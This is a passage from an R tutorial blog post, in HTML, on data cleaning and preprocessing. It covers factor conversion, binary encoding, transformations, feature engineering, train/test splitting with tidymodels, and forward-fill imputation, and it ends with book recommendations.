integer. By converting the &lt;code&gt;gender&lt;/code&gt; column to a factor, we’re telling R
that the variable is categorical and has a limited set of possible
values. Factors also help ensure that the data is treated correctly in
statistical analyses and modelling. Note that &lt;code&gt;as.integer()&lt;/code&gt;
truncates rather than rounds, so an age of 23.8 becomes 23.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.factor&lt;/span&gt;(gender),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.integer&lt;/span&gt;(age))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="3"&gt;
&lt;li&gt;Encoding Categorical Variables&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Many models don’t work with factors (categorical variables) straight out
of the box. A simple workaround is to convert factors to a series of
binary variables:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(is_female &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="4"&gt;
&lt;li&gt;Data Transformation&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Sometimes our models work better with transformed data. For example, if
the distribution of a feature is highly skewed, a log or square root
transform can improve the symmetry of its distribution:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Apply square root transformation to age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(sqrt_age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sqrt&lt;/span&gt;(age))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1 5 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0 5.57&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0 4.80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0 4.80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5 1 4.80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 1 5.39&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70 0 3.32&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="5"&gt;
&lt;li&gt;Feature Engineering&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Feature engineering is just making new columns from old ones. For
example, score per age could be found as:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create new feature: score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(score_per_age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; score &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; age)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1 5 3.2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0 5.57 2.94&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0 4.80 3.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0 4.80 3.35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5 1 4.80 3.41&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 1 5.39 1.38&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70 0 3.32 6.36&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="6"&gt;
&lt;li&gt;Data Splitting&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This is an essential step for many machine learning models; we split the
data into a training set to train the model on, and a test set to allow
us to test model predictions. The {tidymodels} package offers a consistent
and streamlined approach to data splitting and other aspects of modelling
workflows, making it a powerful tool for data scientists.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install and load the tidymodels package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidymodels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidymodels)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a split index using initial_split&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;split_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initial_split&lt;/span&gt;(df_encoded, prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;split_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;Training/Testing/Total&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;3/4/7&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Extract the training and testing data sets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;training&lt;/span&gt;(split_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;testing&lt;/span&gt;(split_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 3 × 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 6 Jenny 29 Female 40 1 5.39 1.38&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 5 Eve 23 Female 78.5 1 4.80 3.41&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 7 Dave 11 Male 70 0 3.32 6.36&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 4 × 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1 5 3.2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0 5.57 2.94&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0 4.80 3.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0 4.80 3.35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We use the &lt;code&gt;initial_split()&lt;/code&gt; function to split the &lt;code&gt;df_encoded&lt;/code&gt;
data frame into training and testing sets. The &lt;code&gt;prop&lt;/code&gt; argument specifies the
proportion of data to allocate to the training set. In this case, we’ve
gone for a 50:50 split, which for our seven rows gives three training rows
and four testing rows. The &lt;code&gt;training()&lt;/code&gt; and &lt;code&gt;testing()&lt;/code&gt; functions are
then used to extract the training and testing data sets.&lt;/p&gt;
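&lt;p&gt;Because &lt;code&gt;initial_split()&lt;/code&gt; samples rows at random, the rows that land in each set can differ from run to run. The following is a minimal sketch, assuming the {rsample} package (which provides &lt;code&gt;initial_split()&lt;/code&gt; and is installed with {tidymodels}) is available. It uses a small made-up data frame, &lt;code&gt;toy&lt;/code&gt;, rather than the data above, and shows how setting a seed first makes the split repeatable:&lt;/p&gt;

```r
library(rsample)

# Hypothetical toy data, for illustration only
toy = data.frame(id = 1:10, score = seq(50, 95, by = 5))

# Fix the random seed so the same rows are selected every time
set.seed(123)
split_a = initial_split(toy, prop = 0.8)

# Re-using the same seed reproduces the same split
set.seed(123)
split_b = initial_split(toy, prop = 0.8)

train_a = training(split_a)
test_a = testing(split_a)

# Same seed, same training rows
identical(train_a$id, training(split_b)$id)

# Every row ends up in exactly one of the two sets
nrow(train_a) + nrow(test_a) == nrow(toy)
```

&lt;p&gt;The seed value itself is arbitrary; what matters is that it is set immediately before the split.&lt;/p&gt;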
&lt;h3 id="advanced-data-cleaning-and-processing-techniques"&gt;Advanced Data Cleaning and Processing Techniques&lt;/h3&gt;
&lt;p&gt;Data cleaning and preprocessing have evolved beyond the traditional
methods. Advanced techniques such as Time-Series Imputation and Deep
Learning-Based Outlier Detection can handle complex scenarios and yield
more accurate results:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Time-Series Imputation:&lt;/strong&gt; Missing values can disrupt patterns.
Techniques like forward-fill (also known as last observation carried
forward) or backward-fill can be effective.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deep Learning-Based Outlier Detection:&lt;/strong&gt; Autoencoders can identify
subtle outliers in high-dimensional data.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
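&lt;p&gt;As a rough illustration of forward-fill and backward-fill, the sketch below uses &lt;code&gt;fill()&lt;/code&gt; from {tidyr}. The data frame &lt;code&gt;readings&lt;/code&gt; and its values are invented for this example, and it assumes the rows are already in time order:&lt;/p&gt;

```r
library(tidyr)

# Hypothetical daily readings with gaps, for illustration only
readings = data.frame(
  day = 1:6,
  value = c(10, NA, NA, 13, NA, 15)
)

# Forward-fill: carry the last observed value forward
forward = fill(readings, value, .direction = "down")

# Backward-fill: pull the next observed value backward
backward = fill(readings, value, .direction = "up")

forward$value
## [1] 10 10 10 13 13 15
backward$value
## [1] 10 13 13 13 15 15
```

&lt;p&gt;Which direction is appropriate depends on the data: forward-fill only uses information that was available at the time, which matters if the series will later be used for forecasting.&lt;/p&gt;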
&lt;h3 id="deeper-dive-into-feature-engineering"&gt;Deeper Dive into Feature Engineering&lt;/h3&gt;
&lt;p&gt;Feature engineering goes beyond data cleaning — it’s about creating new
attributes to improve model performance, for example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Polynomial Features:&lt;/strong&gt; Transforming features into higher-degree
polynomials can capture non-linear relationships.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Interaction Features:&lt;/strong&gt; Multiplying or combining features can reveal
interactions between them.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
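&lt;p&gt;Both ideas can be sketched with &lt;code&gt;mutate()&lt;/code&gt; from {dplyr}. The data frame &lt;code&gt;toy&lt;/code&gt; and the new column names &lt;code&gt;age_squared&lt;/code&gt; and &lt;code&gt;age_x_score&lt;/code&gt; are made up for this example:&lt;/p&gt;

```r
library(dplyr)

# Hypothetical toy data, for illustration only
toy = data.frame(age = c(25, 31, 23), score = c(80, 91, 87))

toy_features = toy %>%
  mutate(
    age_squared = age^2,       # polynomial feature (degree 2)
    age_x_score = age * score  # interaction feature
  )

toy_features$age_squared
## [1] 625 961 529
toy_features$age_x_score
## [1] 2000 2821 2001
```

&lt;p&gt;Whether such features help depends on the model: a linear model cannot learn these terms on its own, whereas tree-based models can often approximate them without help.&lt;/p&gt;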
&lt;p&gt;The following books cover advanced data cleaning and feature
engineering techniques in more depth:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.oreilly.com/library/view/hands-on-exploratory-data/9781789804379/" rel="external"&gt;“Hands-On Exploratory Data Analysis with R” by Radhika Datar and
Harish Garg&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.google.com/books/edition/Feature_Engineering_and_Selection/xy73DwAAQBAJ" rel="external"&gt;“Feature Engineering and Selection: A Practical Approach for
Predictive Models” by Max Kuhn and Kjell
Johnson&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.google.com/books/edition/Feature_Engineering_for_Machine_Learning/sthSDwAAQBAJ" rel="external"&gt;“Feature Engineering for Machine Learning: Principles and Techniques
for Data Scientists” by Alice Zheng and Amanda
Casari&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="automation-and-tools"&gt;Automation and Tools&lt;/h3&gt;
&lt;p&gt;For R users, the journey of data cleaning and preprocessing becomes even
more seamless due to powerful libraries and tools tailored to your
needs. The {tidyverse} suite of packages offers {dplyr} for efficient
data manipulation, {tidyr} for tidying up messy datasets, and
&lt;a href="https://stringr.tidyverse.org/" rel="external"&gt;{stringr}&lt;/a&gt; for handling text data,
among others. Whether it’s imputing missing values, encoding categorical
variables, or standardising features, R’s automation libraries such as
{tidyverse} empower you to focus on extracting insights rather than
getting caught up in manual data cleaning tasks. With these tools by
your side, you can navigate the data preprocessing landscape with
confidence and efficiency.&lt;/p&gt;
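&lt;p&gt;As a small illustration of the kind of tidying these packages support, the sketch below trims and re-cases a text column with {stringr} and standardises a numeric column with {dplyr}. The data frame &lt;code&gt;messy&lt;/code&gt;, its values and the column name &lt;code&gt;score_scaled&lt;/code&gt; are made up for this example:&lt;/p&gt;

```r
library(dplyr)
library(stringr)

# Hypothetical messy input, for illustration only
messy = data.frame(
  name = c("  alice ", "BOB", "amber  "),
  score = c(80, 91, 87)
)

clean = messy %>%
  mutate(
    # Remove surrounding whitespace, then use consistent capitalisation
    name = str_to_title(str_trim(name)),
    # Standardise to mean 0 and standard deviation 1
    score_scaled = (score - mean(score)) / sd(score)
  )

clean$name
## [1] "Alice" "Bob"   "Amber"
```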
&lt;p&gt;In conclusion, data cleaning and preprocessing are essential steps that
pave the way for accurate analysis and reliable insights. By following
the best practices outlined in this blog post, you can ensure that your
data is well-prepared for modelling and analysis.&lt;/p&gt;
&lt;p&gt;By addressing missing values, outliers, and inconsistencies, you’re
laying a strong foundation for impactful data-driven decision-making. As
you delve into more advanced techniques, explore feature engineering,
and embrace automation, you’ll unlock even more potential from your
data. So, whether you’re a data scientist, researcher, or business
professional, embracing these practices will undoubtedly contribute to
the success of your data-driven endeavours.&lt;/p&gt;
&lt;p&gt;Remember that the effort invested in cleaning and preprocessing data is
an investment in the quality of your results.&lt;/p&gt;
&lt;p&gt;Happy data cleaning and preprocessing!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/"&gt;original post&lt;/a&gt;
